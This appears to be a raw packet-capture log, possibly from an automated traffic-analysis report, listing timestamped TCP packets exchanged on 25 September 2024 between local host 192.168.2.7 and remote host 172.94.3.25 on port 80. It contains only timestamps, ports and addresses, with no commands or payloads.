                                      Sep 25, 2024 18:33:54.647140026 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.647144079 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:54.647155046 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.647171021 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.647176981 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:54.647185087 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.647201061 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.647205114 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:54.647216082 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.647231102 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.647244930 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.647248983 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:54.647258997 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.647265911 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:54.647274971 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.647289038 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.647293091 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:54.647304058 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.647319078 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.647320986 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:54.647335052 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.647350073 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.647352934 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:54.647363901 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.647378922 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.647381067 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:54.647412062 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.647416115 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:54.647908926 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.647922993 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.647938013 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.647948980 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:54.647978067 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:54.648046970 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.648063898 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.648077965 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.648101091 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:54.648103952 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.648118019 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.648132086 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.648138046 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:54.648147106 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.648160934 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.648174047 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.648181915 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:54.648189068 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.648202896 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.648211002 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:54.648219109 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.648226023 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:54.648235083 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.648248911 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.648258924 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:54.648262978 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.648277998 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.648283958 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:54.648293018 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.648307085 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.648324013 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:54.648349047 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:54.648835897 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.648850918 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.648864985 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.648879051 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.648885012 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:54.648895979 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.648910999 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.648915052 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:54.648933887 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.648950100 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.648951054 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:54.648963928 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.648978949 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.648991108 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:54.648993969 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.649008989 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.649023056 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.649024963 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:54.649039984 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.649054050 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.649055004 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:54.649068117 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.649081945 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.649085045 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:54.649097919 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.649111986 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.649116039 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:54.649126053 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.649127960 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:54.649141073 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.649156094 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.649171114 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.649182081 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:54.649187088 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.649202108 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.649211884 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:54.649216890 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.649219036 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:54.649257898 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:54.649777889 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.649795055 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.649811983 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.649840117 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.649847031 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:54.649853945 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.649868011 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.649873018 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:54.649883032 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.649898052 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.649900913 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:54.649913073 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.649928093 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.649944067 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.649946928 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:54.649959087 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.649966955 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:54.649974108 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.649987936 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.649991035 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:54.650002003 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.650017023 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.650032997 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.650032997 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:54.650047064 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.650057077 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:54.650068998 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.650084019 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.650085926 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:54.650098085 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.650115013 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.650132895 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:54.650151968 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:54.870347023 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.870462894 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:54.891269922 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:54.896182060 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.896231890 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.896248102 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.896282911 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:54.896356106 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.896370888 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.896384954 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.896399975 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.896414042 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:54.896445036 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:54.896477938 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.896492004 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.896559000 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:54.896612883 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.896627903 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.896642923 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.896656990 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.896672964 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.896681070 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:54.896681070 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:54.896687031 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.896707058 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:54.896873951 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.896888018 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.896903038 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.896917105 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.896931887 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.896948099 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.896950006 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:54.896950006 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:54.896964073 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.896970034 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:54.897151947 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.897166014 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.897181034 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.897195101 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.897197962 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:54.897197962 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:54.897208929 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.897222996 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.897237062 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.897253990 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:54.897253990 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:54.897260904 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.897377968 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:54.897700071 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.897713900 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.897727966 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.897747993 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:54.897835016 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.897849083 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.897862911 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.897877932 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.897897005 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:54.897897005 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:54.897907972 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.897947073 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:54.898106098 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.898161888 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.898176908 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.898209095 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:54.898278952 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.898293972 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.898308039 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.898345947 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.898363113 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:54.898363113 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:54.898410082 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.898423910 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.898438931 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.898453951 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.898472071 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:54.898472071 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:54.898479939 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.898494959 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.898509026 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.898524046 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.898546934 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:54.898546934 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:54.899122953 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.899162054 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:54.899168015 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.899183035 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.899269104 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.899282932 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.899296999 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.899312019 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.899313927 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:54.899313927 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:54.899410009 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:54.899492979 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.899507046 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.899519920 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.899533987 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.899549007 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.899560928 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:54.899560928 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:54.899564028 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.899578094 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.899594069 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.899600029 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:54.899662018 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:54.900156021 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.900193930 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.900208950 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.900332928 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.900350094 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.900357962 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:54.900365114 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.900381088 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.900398970 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:54.900398970 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:54.900564909 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.900588989 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.900599003 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:54.900603056 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.900616884 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.900631905 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.900646925 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.900661945 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.900676966 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:54.900676966 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:54.900677919 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.900896072 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:54.901047945 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.901093006 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.901108980 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.901155949 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:54.901155949 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:54.901204109 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.901218891 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.901233912 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.901249886 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.901292086 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:54.901292086 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:54.901525021 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.901573896 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.901588917 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.901607037 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:54.901645899 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.901659966 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.901676893 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.901715040 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:54.901715040 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:54.901792049 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.901807070 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.901822090 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.901835918 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.901849985 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:54.901849985 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.901866913 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.901901960 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:54.901901960 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:54.901916027 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.901940107 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.901957989 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.901990891 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:54.902497053 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.902556896 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.902560949 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:54.902571917 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.902586937 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.902664900 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.902679920 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.902698994 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:54.902698994 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:54.902702093 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.902717113 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.902731895 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.902761936 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:54.902761936 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:54.902839899 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.902853966 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.902868032 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.902884007 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.902903080 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:54.902930021 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.902945042 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.902988911 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:54.902988911 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:54.903526068 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.903538942 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.903553009 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.903587103 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:54.903605938 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.903620958 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.903636932 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.903654099 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.903661013 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:54.903673887 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:54.903810978 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.903825045 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.903840065 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.903847933 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:54.903866053 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.903881073 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.903897047 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.903912067 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.903925896 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.903932095 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:54.903932095 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:54.903985023 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:54.904448986 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.904493093 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:54.904508114 CEST8049699172.94.3.25192.168.2.7
